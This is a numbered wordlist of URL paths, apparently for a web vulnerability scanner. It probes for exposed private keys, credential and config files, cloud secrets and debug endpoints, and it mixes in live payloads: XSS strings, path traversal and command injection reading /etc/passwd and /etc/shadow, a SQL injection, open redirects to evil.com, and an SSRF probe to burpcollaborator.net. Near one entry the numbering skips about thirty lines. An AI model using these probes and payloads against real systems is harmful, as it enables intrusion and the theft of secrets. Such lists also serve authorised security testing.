/.github/workflows/smoosh-status.yml 1941 | /.github/workflows/snyk.yml 1942 | /.github/workflows/test.yaml 1943 | /.github/workflows/test.yml 1944 | /.github/workflows/tests.yaml 1945 | /.github/workflows/tests.yml 1946 | /.gitignore 1947 | /.gitlab-ci.yml 1948 | /.hg/hgrc 1949 | /.htaccess 1950 | /.htpasswd 1951 | /.idea 1952 | /.idea/dataSources.xml 1953 | /.idea/deployment.xml 1954 | /.idea/httpRequests/http-client.cookies 1955 | /.idea/httpRequests/http-requests-log.http 1956 | /.idea/misc.xml 1957 | /.idea/modules.xml 1958 | /.idea/php.xml 1959 | /.idea/vcs.xml 1960 | /.idea/workspace.xml 1961 | /.jenkins.sh 1962 | /.mailmap 1963 | /.msmtprc 1964 | /.netrc 1965 | /.npm/anonymous-cli-metrics.json 1966 | /.npmignore 1967 | /.npmrc 1968 | /.passwd-s3fs 1969 | /.phpunit.result.cache 1970 | /.purple/accounts.xml 1971 | /.redmine 1972 | /.redmine-cli 1973 | /.s3cfg 1974 | /.s3ql/authinfo2 1975 | /.settings/rules.json?auth=FIREBASE_SECRET 1976 | /.shodan/api_key 1977 | /.snyk 1978 | /.ssh/authorized_keys 1979 | /.ssh/authorized_keys2 1980 | /.ssh/config 1981 | /.ssh/id_dsa 1982 | /.ssh/id_rsa 1983 | /.ssh/id_rsa.pub 1984 | /.ssh/known_hosts 1985 | /.ssh/known_hosts.old 1986 | /.styleci.yml 1987 | /.svn 1988 | /.svn/entries 1989 | /.svn/prop 1990 | /.svn/text 1991 | /.travis.sh 1992 | /.travis.yml 1993 | /.tugboat 1994 | /.user.ini 1995 | /.vscode/ 1996 | /.vscode/settings.json 1997 | /.well 1998 | /.well-known 1999 | /.well-known/matrix/client 2000 | /.well-known/matrix/server 2001 | /.well-known/openid-configuration 2002 | /.wget-hsts 2003 | /.wgetrc 2004 | /.wp-config.php.swp 2005 | /////evil.com 2006 | ///evil.com/%2F.. 2007 | //admin/ 2008 | //anything/admin/ 2009 | //evil.com/%2F.. 2010 | //evil.com/..;/css 2011 | //secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search 2012 | /1.sql 2013 | /404.php.bak 2014 | /?view=log 2015 | /?wsdl 2016 | /_/.ssh/authorized_keys 2017 | /___graphql 2018 | /__clockwork/app 2019 | /__swagger__/ 2020 | /_cat 2021 | /_cat/health 2022 | /_cat/indices 2023 | /_cluster/health 2024 | /_cluster/stats 2025 | /_config.yml 2026 | /_cperror 2027 | /_darcs/prefs/binaries 2028 | /_debug 2029 | /_debug_toolbar 2030 | /_debugbar/open?max=20&offset=0 2031 | /_netrc 2032 | /_nodes/stats 2033 | /_notes/dwsync.xml 2034 | /_profiler/ 2035 | /_profiler/empty/search/results?limit=10 2036 | /_profiler/phpinfo 2037 | /_profiler/phpinfo.php 2038 | /_site 2039 | /_something_.cfm 2040 | /_swagger_/ 2041 | /_vti_bin/Authentication.asmx?op=Mode 2042 | /_vti_bin/lists.asmx?WSDL 2043 | /_wdt/ 2044 | /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd 2045 | /abs/ 2046 | /access.log 2047 | /access/config 2048 | /access_tokens.db 2049 | /actions/seomatic/meta 2050 | /actuator 2051 | /actuator/auditevents 2052 | /actuator/auditLog 2053 | /actuator/beans 2054 | /actuator/caches 2055 | /actuator/conditions 2056 | /actuator/configprops 2057 | /actuator/configurationMetadata 2058 | /actuator/dump 2059 | /actuator/env 2060 | /actuator/events 2061 | /actuator/exportRegisteredServices 2062 | /actuator/favicon.ico 2063 | /actuator/features 2064 | /actuator/flyway 2065 | /actuator/health 2066 | /actuator/healthcheck 2067 | /actuator/heapdump 2068 | /actuator/httptrace 2069 | /actuator/hystrix.stream 2070 | /actuator/info 2071 | /actuator/integrationgraph 2072 | /actuator/jolokia 2073 | /actuator/liquibase 2074 | /actuator/logfile 2075 | /actuator/loggers 2076 | /actuator/loggingConfig 2077 | /actuator/management 2078 | /actuator/mappings 2079 | /actuator/metrics 2080 | /actuator/prometheus 2081 | /actuator/refresh 2082 | /actuator/registeredServices 2083 | /actuator/releaseAttributes 2084 | /actuator/resolveAttributes 2085 | /actuator/scheduledtasks 2086 | /actuator/sessions 2087 | /actuator/shutdown 2088 | /actuator/springWebflow 2089 | /actuator/sso 2090 | /actuator/ssoSessions 2091 | /actuator/statistics 2092 | /actuator/status 2093 | /actuator/threaddump 2094 | /actuator/trace 2095 | /actuators/ 2096 | /actuators/dump 2097 | /actuators/env 2098 | /actuators/health 2099 | /actuators/logfile 2100 | /actuators/mappings 2101 | /actuators/shutdown 2102 | /actuators/trace 2103 | /adfs/ls/idpinitiatedsignon.aspx 2104 | /adfs/services/trust/2005/windowstransport 2105 | /adjuncts/3a890183/ 2106 | /admin 2107 | /admin../admin 2108 | /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s 2109 | /admin/ 2110 | /Admin/ 2111 | /admin/../admin 2112 | /admin//phpmyadmin/ 2113 | /admin/adminer.php 2114 | /admin/buoy 2115 | /admin/config 2116 | /admin/config.json 2117 | /admin/configs/application.ini 2118 | /admin/data/autosuggest 2119 | /admin/error.log 2120 | /admin/errors.log 2121 | /admin/expvar 2122 | /admin/gc 2123 | /admin/heap 2124 | /admin/heapdump 2125 | /admin/index.php 2126 | /admin/init 2127 | /admin/log/error.log 2128 | /admin/login 2129 | /admin/login.html 2130 | /admin/login/?next=/admin/ 2131 | /admin/logs/error.log 2132 | /admin/logs/errors.log 2133 | /admin/metrics 2134 | /admin/outgoing 2135 | /admin/ping 2136 | /admin/pprof 2137 | /admin/proxy/config.json 2138 | /admin/proxy/configs 2139 | /admin/proxy/discovery 2140 | /admin/proxy/metrics 2141 | /admin/proxy/routes 2142 | /admin/proxy/servers 2143 | /admin/proxy/svc 2144 | /admin/proxy/tap 2145 | /admin/proxy/tree 2146 | /admin/proxy/vars 2147 | /admin/proxy/versions 2148 | /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 2149 | /admin/routes 2150 | /admin/runtime/tree 2151 | /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 2152 | /admin/tap 2153 | /admin/threadz 2154 | /admin/tls 2155 | /admin/tracing 2156 | /admin/views/ajax/autocomplete/user/a 2157 | /admin;/ 2158 | /Admin;/ 2159 | /adminadminer.php 2160 | /adminer.php 2161 | /adminer/ 2162 | /adminer/adminer.php 2163 | /adminer/index.php 2164 | /ADSearch.cc?methodToCall=search 2165 | /aims/ps/ 2166 | /airflow.cfg 2167 | /AirWatch/Login 2168 | /alerts 2169 | /alps/profile 2170 | /altair 2171 | /analytics/saw.dll?bieehome&startPage=1#grabautologincookies 2172 | /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd 2173 | /anchor/errors.log 2174 | /android/app/google-services.json 2175 | /anonymous-cli-metrics.json 2176 | /ansible.cfg 2177 | /anything_here 2178 | /apache 2179 | /apache.conf 2180 | /apc.php 2181 | /apc/apc.php 2182 | /api 2183 | /api-docs 2184 | /api-docs/swagger.json 2185 | /api-docs/swagger.yaml 2186 | /api/ 2187 | /api/.env 2188 | /api/__swagger__/ 2189 | /api/_swagger_/ 2190 | /api/api 2191 | /api/api-browser/ 2192 | /api/api-docs 2193 | /api/api-docs/swagger.json 2194 | /api/api-docs/swagger.yaml 2195 | /api/apidocs 2196 | /api/apidocs/swagger.json 2197 | /api/apidocs/swagger.yaml 2198 | /api/application.wadl 2199 | /api/batch 2200 | /api/cask/graphql 2201 | /api/cask/graphql-playground 2202 | /api/config 2203 | /api/dependencies 2204 | /api/docs 2205 | /api/docs/ 2206 | /api/falco 2207 | /api/graphql 2208 | /api/graphql/v1 2209 | /api/index.html 2210 | /api/jolokia/read?mimeType=text/html 2211 | /api/jsonws 2212 | /api/jsonws/invoke 2213 | /api/operations 2214 | /api/plugins.json 2215 | /api/plugins.json.xz 2216 | /api/profile 2217 | /api/proxy 2218 | /api/services 2219 | /api/snapshots 2220 | /api/spec/swagger.json 2221 | /api/spec/swagger.yaml 2222 | /api/swagger 2223 | /api/swagger-resources 2224 | /api/swagger-resources/restservices/v2/api-docs 2225 | /api/swagger-ui.html 2226 | /api/swagger-ui/api-docs 2227 | /api/swagger-ui/swagger.json 2228 | /api/swagger-ui/swagger.yaml 2229 | /api/swagger.json 2230 | /api/swagger.yaml 2231 | /api/swagger.yml 2232 | /api/swagger/index.html 2233 | /api/swagger/static/index.html 2234 | /api/swagger/swagger 2235 | /api/swagger/swagger-ui.html 2236 | /api/swagger/ui/index 2237 | /api/swagger_doc.json 2238 | /api/timelion/run 2239 | /api/traces 2240 | /api/v1 2241 | /api/v1/ 2242 | /api/v1/alerts 2243 | /api/v1/application.wadl 2244 | /api/v1/authorities 2245 | /api/v1/canal/config/1/1 2246 | /api/v1/label//values 2247 | /api/v1/label/__name__/values 2248 | /api/v1/label/job/values 2249 | /api/v1/metadata 2250 | /api/v1/namespaces 2251 | /api/v1/namespaces/default/pods 2252 | /api/v1/namespaces/default/secrets 2253 | /api/v1/namespaces/default/services 2254 | /api/v1/nodes 2255 | /api/v1/query 2256 | /api/v1/query_range 2257 | /api/v1/query_range?query=up&start=1633730000&end=1633733600&step=15s 2258 | /api/v1/repositories 2259 | /api/v1/rules 2260 | /api/v1/series 2261 | /api/v1/session 2262 | /api/v1/status/config 2263 | /api/v1/status/label/ 2264 | /api/v1/status/metadata 2265 | /api/v1/status/rules 2266 | /api/v1/status/tsdb 2267 | /api/v1/status/tsdb/rules 2268 | /api/v1/swagger-ui/swagger.json 2269 | /api/v1/swagger-ui/swagger.yaml 2270 | /api/v1/swagger.json 2271 | /api/v1/swagger.yaml 2272 | /api/v1/targets 2273 | /api/v2 2274 | /api/v2.0/configuration 2275 | /api/v2.0/health 2276 | /api/v2.0/preference 2277 | /api/v2.0/projects 2278 | /api/v2.0/statistics 2279 | /api/v2.0/systeminfo 2280 | /api/v2.0/users 2281 | /api/v2/application.wadl 2282 | /api/v2/swagger.json 2283 | /api/v2/swagger.yaml 2284 | /api/v4/application/settings 2285 | /api/v4/groups 2286 | /api/v4/internal/allowed 2287 | /api/v4/internal/check 2288 | /api/v4/internal/lfs_authenticate 2289 | /api/v4/projects 2290 | /api/v4/users 2291 | /api/values/1 2292 | /api/vendor/phpunit/phpunit/phpunit 2293 | /api/whoami 2294 | /api_docs 2295 | /api_smartapp/storage/ 2296 | /apidocs 2297 | /apis 2298 | /apis/apps/v1/namespaces/default/deployments 2299 | /apis/ceph.rook.io/v1/namespaces/default/clusters/my-cluster 2300 | /aplicacao/application/configs/application.ini 2301 | /app/config/parameters.yml 2302 | /app/config/parameters.yml.dist 2303 | /app/config/pimcore/google-api-private-key.json 2304 | /app/config/security.yml 2305 | /app/etc/local.xml 2306 | /app/google-services.json 2307 | /app/kibana 2308 | /app/kibana/ 2309 | /app/logs 2310 | /app/settings.py 2311 | /App_Data/ 2312 | /app_dev.php 2313 | /app_dev.php/cache 2314 | /App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1 2315 | /app_test.php 2316 | /application.ini 2317 | /application.wadl 2318 | /application.wadl?detail=true 2319 | /application/configs/application.ini 2320 | /application/logs/access.log 2321 | /application/logs/application.log 2322 | /application/logs/default.log 2323 | /apps/vendor/phpunit/phpunit/phpunit 2324 | /appsettings.json 2325 | /appspec.yaml 2326 | /appspec.yml 2327 | /appveyor.yml 2328 | /asdf.php 2329 | /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 2330 | /assets 2331 | /assets../.git/config 2332 | /assets/.gitignore 2333 | /assets/config.rb 2334 | /assets/credentials.json 2335 | /assets/file 2336 | /assets/other/service-account-credentials.json 2337 | /asynchPeople/ 2338 | /auditevents 2339 | /aura 2340 | /auth.html 2341 | /auth/login 2342 | /auth/realms/master/.well-known/openid-configuration 2343 | /auth/token 2344 | /authorization.do 2345 | /autoconfig 2346 | /autodiscover/ 2347 | /autoupdate/ 2348 | /aws.sh 2349 | /awstats.conf 2350 | /awstats.pl 2351 | /awstats/ 2352 | /axis/ 2353 | /axis/happyaxis.jsp 2354 | /axis2-web/HappyAxis.jsp 2355 | /axis2/ 2356 | /axis2/axis2-web/HappyAxis.jsp 2357 | /azure-pipelines.yml 2358 | /backend 2359 | /backup 2360 | /backup.sh 2361 | /backup.sql 2362 | /backup/vendor/phpunit/phpunit/phpunit 2363 | /base/static/c 2364 | /beans 2365 | /bin/catalina.sh 2366 | /bin/console 2367 | /BitKeeper/etc/config 2368 | /blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= 2369 | /blog/phpmyadmin/ 2370 | /bower.json 2371 | /brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB 2372 | /bugs/verify.php?confirm_hash=&id=1 2373 | /build 2374 | /build.sh 2375 | /bundles/kibana.style.css 2376 | /bundles/login.bundle.js 2377 | /cacti/ 2378 | /certenroll/ 2379 | /certprov/ 2380 | /certsrv/ 2381 | /cfcache.map 2382 | /CFIDE/administrator/images/background.jpg 2383 | /cfide/administrator/images/background.jpg 2384 | /CFIDE/administrator/images/componentutilslogin.jpg 2385 | /cfide/administrator/images/componentutilslogin.jpg 2386 | /CFIDE/administrator/images/mx_login.gif 2387 | /cfide/administrator/images/mx_login.gif 2388 | /cgi 2389 | /cgi-bin/nagios3/status.cgi 2390 | /cgi-bin/nagios4/status.cgi 2391 | /cgi-bin/php 2392 | /cgi-bin/printenv.pl 2393 | /cgi-bin/upload/web-ftp.cgi 2394 | /CGI/Java/Serviceability?adapter=device.statistics.configuration 2395 | /CgiStart?page=Single 2396 | /CHANGELOG.md 2397 | /ckeditor/samples/ 2398 | /client_secrets.json 2399 | /clientaccesspolicy.xml 2400 | /cloud-config.yml 2401 | /cloudexp/application/configs/application.ini 2402 | /cloudfoundryapplication 2403 | /cluster 2404 | /cluster/cluster 2405 | /clusters 2406 | /cms/application/configs/application.ini 2407 | /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 2408 | /cobbler_api 2409 | /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 2410 | /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1 2411 | /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1 2412 | /compile.sh 2413 | /compile/ 2414 | /composer.json 2415 | /composer.lock 2416 | /composer.phar 2417 | /conditions 2418 | /conf/ 2419 | /conf/cassandra-env.sh 2420 | /conf/cassandra.yaml 2421 | /conf/httpd.conf 2422 | /conf/tomcat-users.xml 2423 | /conf/zoo.cfg 2424 | /config 2425 | /config.inc.php 2426 | /config.js 2427 | /config.php 2428 | /config.php.bak 2429 | /config.rb 2430 | /config.sh 2431 | /config/ 2432 | /config/configuration.yml 2433 | /config/database.yml 2434 | /config/database.yml.enc 2435 | /config/databases.yml 2436 | /config/elasticsearch.yml 2437 | /config/environment.rb 2438 | /config/error_log 2439 | /config/initializers/secret_token.rb 2440 | /config/jvm.options 2441 | /config/jwt/private.pem 2442 | /config/log4j2.properties 2443 | /config/master.key 2444 | /config/packages/security.yaml 2445 | /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E 2446 | /config/properties.ini 2447 | /config/secrets.yml 2448 | /config/security.yml 2449 | /config/settings.local.yml 2450 | /config/settings.yml 2451 | /config/storage.yml 2452 | /config/user.xml 2453 | /config_dump 2454 | /configprops 2455 | /configuration.php 2456 | /configuration.php-dist 2457 | /configuration.yml 2458 | /configurations/config_default 2459 | /configure/app/landing/welcome-srm-va.html 2460 | /configz 2461 | /confluence 2462 | /conn.php.bak 2463 | /connz 2464 | /console 2465 | /console/login/LoginForm.jsp 2466 | /consoles 2467 | /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 2468 | /containerLogs 2469 | /containers/json 2470 | /content../.git/config 2471 | /context.json 2472 | /control 2473 | /control/login 2474 | /control/stream?contentId= 2475 | /controller/config 2476 | /controller/registry 2477 | /controller/registry-clients 2478 | /core-cloud-config.yml 2479 | /core/config/databases.yml 2480 | /counters 2481 | /cp/Shares?user=&protocol=webaccess&v=2.3 2482 | /credentials.db 2483 | /credentials.json 2484 | /crossdomain.xml 2485 | /crowd/console/login.action 2486 | /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow 2487 | /crx/de/index.jsp 2488 | /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent( 2489 | /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent( 2490 | /css../.git/config 2491 | /CTCWebService/CTCWebServiceBean 2492 | /CTCWebService/CTCWebServiceBean?wsdl 2493 | /darkstat/ 2494 | /dasbhoard/ 2495 | /dashboard/ 2496 | /dashboard/phpinfo.php 2497 | /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 2498 | /data.sql 2499 | /data/ 2500 | /data/adminer.php 2501 | /data/autosuggest 2502 | /data/db/mysql/user.frm 2503 | /data/pgdata/pg_hba.conf 2504 | /data/version-2/ 2505 | /data?get=prodServerGen 2506 | /database.php.bak 2507 | /database.sql 2508 | /database/schema.rb 2509 | /db.php.bak 2510 | /db.sql 2511 | /db/ 2512 | /db/robomongo.json 2513 | /db/schema.rb 2514 | /db_backup.sql 2515 | /db_config.php.bak 2516 | /dbaas_monitor/login 2517 | /dbdump.sql 2518 | /debug 2519 | /debug.cgi 2520 | /debug.seam 2521 | /debug/ 2522 | /debug/default/view 2523 | /debug/default/view.html 2524 | /debug/health 2525 | /debug/log 2526 | /debug/mysql_debug/pprof 2527 | /debug/mysql_debug/vars 2528 | /debug/mysql_schema 2529 | /debug/mysql_stats/queries 2530 | /debug/mysql_stats/schema 2531 | /debug/mysql_stats/vschema 2532 | /debug/mysql_waiters 2533 | /debug/pprof 2534 | /debug/pprof/block 2535 | /debug/pprof/heap 2536 | /debug/pprof/threadcreate 2537 | /debug/pprof/trace 2538 | /debug/queryz 2539 | /debug/requests 2540 | /debug/route/ 2541 | /debug/schemaz 2542 | /debug/tschema 2543 | /debug/vars 2544 | /debug/vschema 2545 | /default.php.bak 2546 | /demo 2547 | /deploy.sh 2548 | /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample 2549 | /desktop.ini 2550 | /DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1 2551 | /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 2552 | /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 2553 | /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 2554 | /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 2555 | /destination 2556 | /dev2local.sh 2557 | /development.log 2558 | /dfshealth.html 2559 | /dialin/ 2560 | /dispatcher/invalidate.cache 2561 | /django/settings.py 2562 | /doc/page/login.asp 2563 | /doc/script/common.js 2564 | /docker-cloud.yml 2565 | /docker-compose-dev.yml 2566 | /docker-compose.dev.yml 2567 | /docker-compose.override.yml 2568 | /docker-compose.prod.yml 2569 | /docker-compose.production.yml 2570 | /docker-compose.staging.yml 2571 | /docker-compose.yml 2572 | /Dockerrun.aws.json 2573 | /docs 2574 | /docs/swagger.json 2575 | /domcfg.nsf 2576 | /download 2577 | /druid/coordinator/v1/leader 2578 | /druid/coordinator/v1/metadata/datasources 2579 | /druid/index.html 2580 | /druid/indexer/v1/taskStatus 2581 | /dump 2582 | /dump.sql 2583 | /dwr/index.html 2584 | /eam/vib?id=/etc/issue 2585 | /ecp/ 2586 | /editor/ckeditor/samples/ 2587 | /elfinder.html 2588 | /elmah.axd 2589 | /elocker_old/storage/ 2590 | /email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E 2591 | /emergency.php 2592 | /env 2593 | /env.dev.js 2594 | /env.development.js 2595 | /env.js 2596 | /env.prod.js 2597 | /env.production.js 2598 | /env.sh 2599 | /env.test.js 2600 | /environment.rb 2601 | /equipbid/storage/ 2602 | /error 2603 | /error.log 2604 | /error.txt 2605 | /error/error.log 2606 | /error_log 2607 | /error_log.txt 2608 | /errors.log 2609 | /errors.txt 2610 | /errors/errors.log 2611 | /errors_log 2612 | /etc 2613 | /etc/ 2614 | /events../.git/config 2615 | /evil%E3%80%82com 2616 | /evil.com/ 2617 | /evil.com// 2618 | /ews/ 2619 | /examples/jsp/index.html 2620 | /examples/jsp/snp/snoop.jsp 2621 | /examples/servlets/index.html 2622 | /examples/websocket/index.xhtml 2623 | /exchange/ 2624 | /exchweb/ 2625 | /exec 2626 | /explore 2627 | /explorer 2628 | /explorer/api-docs 2629 | /explorer/swagger-ui 2630 | /express 2631 | /express-graphql 2632 | /express-server.js 2633 | /extdirect 2634 | /favicon.ico 2635 | /fckeditor/_samples/default.html 2636 | /federate 2637 | /fetch 2638 | /filemanager/upload.php 2639 | /filezilla.xml 2640 | /FileZilla.xml 2641 | /filter/jmol/iframe.php?_USE=%22};alert(1337);// 2642 | /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file 2643 | /final/ 2644 | /flask.session 2645 | /flow/registries 2646 | /footer.php.bak 2647 | /forum/phpmyadmin/ 2648 | /frontend/web/debug/default/view 2649 | /ftpsync.settings 2650 | /function 2651 | /fw.login.php 2652 | /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 2653 | /gallery/zp 2654 | /Gemfile 2655 | /Gemfile.lock 2656 | /gems 2657 | /getcfg.php 2658 | /getFavicon?host=burpcollaborator.net 2659 | /git-receive-pack 2660 | /global 2661 | /Global.asax 2662 | /glpi/status.php 2663 | /glpi2/status.php 2664 | /google-api-private-key.json 2665 | /google-services.json 2666 | /gotoURL.asp?url=google.com&id=43569 2667 | /graph 2668 | /graph_cms 2669 | /graphiql 2670 | /graphiql.css 2671 | /graphiql.js 2672 | /graphiql.min.css 2673 | /graphiql.min.js 2674 | /graphiql.php 2675 | /graphiql/finland 2676 | /graphql 2677 | /graphql-console 2678 | /graphql-devtools 2679 | /graphql-explorer 2680 | /graphql-playground 2681 | /graphql-playground-html 2682 | /graphql.php 2683 | /graphql/console 2684 | /graphql/graphql 2685 | /graphql/graphql-playground 2686 | /graphql/schema.json 2687 | /graphql/schema.xml 2688 | /graphql/schema.yaml 2689 | /graphql/v1 2690 | /groovyconsole 2691 | /groupexpansion/ 2692 | /Gruntfile.coffee 2693 | /Gruntfile.js 2694 | /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E 2695 | /hadoop/logs/userlogs/job_id/attempt_id/container_id/stdout 2696 | /happyaxis.jsp 2697 | /header.php.bak 2698 | /health 2699 | /healthcheck 2700 | /healthz 2701 | /heapdump 2702 | /help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E 2703 | /home.html 2704 | /homepage.nsf 2705 | /hopfully404 2706 | /host-manager/html 2707 | /host.key 2708 | /hosts 2709 | /hsqldb%0a 2710 | /htdocs 2711 | /httpd.conf 2712 | /hybridconfig/ 2713 | /HyperGraphQL 2714 | /hystrix.stream 2715 | /i.php 2716 | /id_dsa 2717 | /id_rsa 2718 | /IdentityGuardSelfService/ 2719 | /IdentityGuardSelfService/images/favicon.ico 2720 | /images../.git/config 2721 | /images/favicon.ico 2722 | /images/json 2723 | /img../.git/config 2724 | /IMS 2725 | /includes/.gitignore 2726 | /index.htm 2727 | /index.html 2728 | /index.jsp 2729 | /index.php 2730 | /index.php.bak 2731 | /index.php/admin/ 2732 | /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E 2733 | /index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 2734 | /index.php?redirect=//evil.com 2735 | /index.php?redirect=/\/evil.com/ 2736 | /INF/maven/com.atlassian.jira/atlassian 2737 | /info 2738 | /info.php 2739 | /info/ 2740 | /info/status 2741 | /infophp.php 2742 | /infos.php 2743 | /init.sh 2744 | /inormalydonotexist 2745 | /iNotes/Forms5.nsf 2746 | /iNotes/Forms6.nsf 2747 | /iNotes/Forms7.nsf 2748 | /iNotes/Forms8.nsf 2749 | /iNotes/Forms85.nsf 2750 | /iNotes/Forms9.nsf 2751 | /install 2752 | /install.php 2753 | /install.php?profile=default 2754 | /install.sh 2755 | /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 2756 | /installer 2757 | /interactive/docs 2758 | /interpreter 2759 | /intikal/storage/ 2760 | /invoker/EJBInvokerServlet/ 2761 | /invoker/JMXInvokerServlet 2762 | /invoker/JMXInvokerServlet/ 2763 | /ioncube/loader-wizard.php 2764 | /ipython/tree 2765 | /irj/portal 2766 | /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f 2767 | /jasperserver/login.html?error=1 2768 | /je/graphql 2769 | /jeecg-boot/ 2770 | /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample 2771 | /jenkins/script 2772 | /jira/secure/Dashboard.jspa 2773 | /jkstatus 2774 | /jkstatus/ 2775 | /jkstatus; 2776 | /jmx 2777 | /jmx-console 2778 | /jnlpJars/ 2779 | /jobmanager/ 2780 | /jobmanager/logs/ 2781 | /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 2782 | /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc 2783 | /jobs/ 2784 | /jolokia 2785 | /jolokia/exec/ch.qos.logback.classic 2786 | /jolokia/list 2787 | /jolokia/read?mimeType=text/html 2788 | /jolokia/version 2789 | /josso/%5C../invoker/EJBInvokerServlet/ 2790 | /josso/%5C../invoker/JMXInvokerServlet/ 2791 | /js../.git/config 2792 | /js/elfinder.min.js 2793 | /js/elFinder.version.js 2794 | /jsapi_ticket.json 2795 | /jsonapi/user/user 2796 | /jsp/help 2797 | /jwt/private.pem 2798 | /kafka-manager/ 2799 | /karma.conf.js 2800 | /key.pem 2801 | /keycloak.json 2802 | /kustomization.yml 2803 | /laravel 2804 | /laravel-graphql-playground 2805 | /leader 2806 | /lfm.php 2807 | /lib../.git/config 2808 | /lib/phpunit/phpunit/phpunit 2809 | /libraries/joomla/database/ 2810 | /libs/granite/core/content/login/favicon.ico 2811 | /LICENSE.txt 2812 | /linusadmin-phpinfo.php 2813 | /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; 2814 | /loader-wizard.php 2815 | /loadtextfile.htm#programinfo 2816 | /local2dev.sh 2817 | /local2prod.sh 2818 | /localhost.key 2819 | /localhost.sql 2820 | /LocalSettings.php 2821 | /log.log 2822 | /log.txt 2823 | /log/access.log 2824 | /log/debug.log 2825 | /log/development.log 2826 | /log/error.log 2827 | /log/errors.log 2828 | /log/firewall.log 2829 | /log/mobile.log 2830 | /log/production.log 2831 | /log/system.log 2832 | /log/vpn.log 2833 | /log/warn.log 2834 | /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E 2835 | /logfile 2836 | /loggers 2837 | /logging 2838 | /login 2839 | /login.jsp 2840 | /login.php 2841 | /login.php.bak 2842 | /Login?!> 2875 | /metrics 2876 | /mgmt/tm/sys/management 2877 | /mgmt/tm/sys/management-ip 2878 | /microsoft 2879 | /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https 2880 | /mifs/c/d/android.html 2881 | /mifs/login.jsp 2882 | /mifs/user/login.jsp 2883 | /mobile/error 2884 | /module/ 2885 | /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 2886 | /modules/system/assets/js/framework.combined-min.js 2887 | /modules/vendor/phpunit/phpunit/phpunit 2888 | /monitor 2889 | /monitor_agent 2890 | /moto/application/configs/application.ini 2891 | /mrtg/ 2892 | /MRTG/ 2893 | /my.key 2894 | /my.ppk 2895 | /MyErrors.log 2896 | /mysql.initial.sql 2897 | /mysql.sql 2898 | /mysql/admin/ 2899 | /mysql/mysqlmanager/ 2900 | /mysqlbackup.sh 2901 | /mysqldump.sql 2902 | /nagios 2903 | /nagios/cgi-bin/status.cgi 2904 | /names.nsf/People?OpenView 2905 | 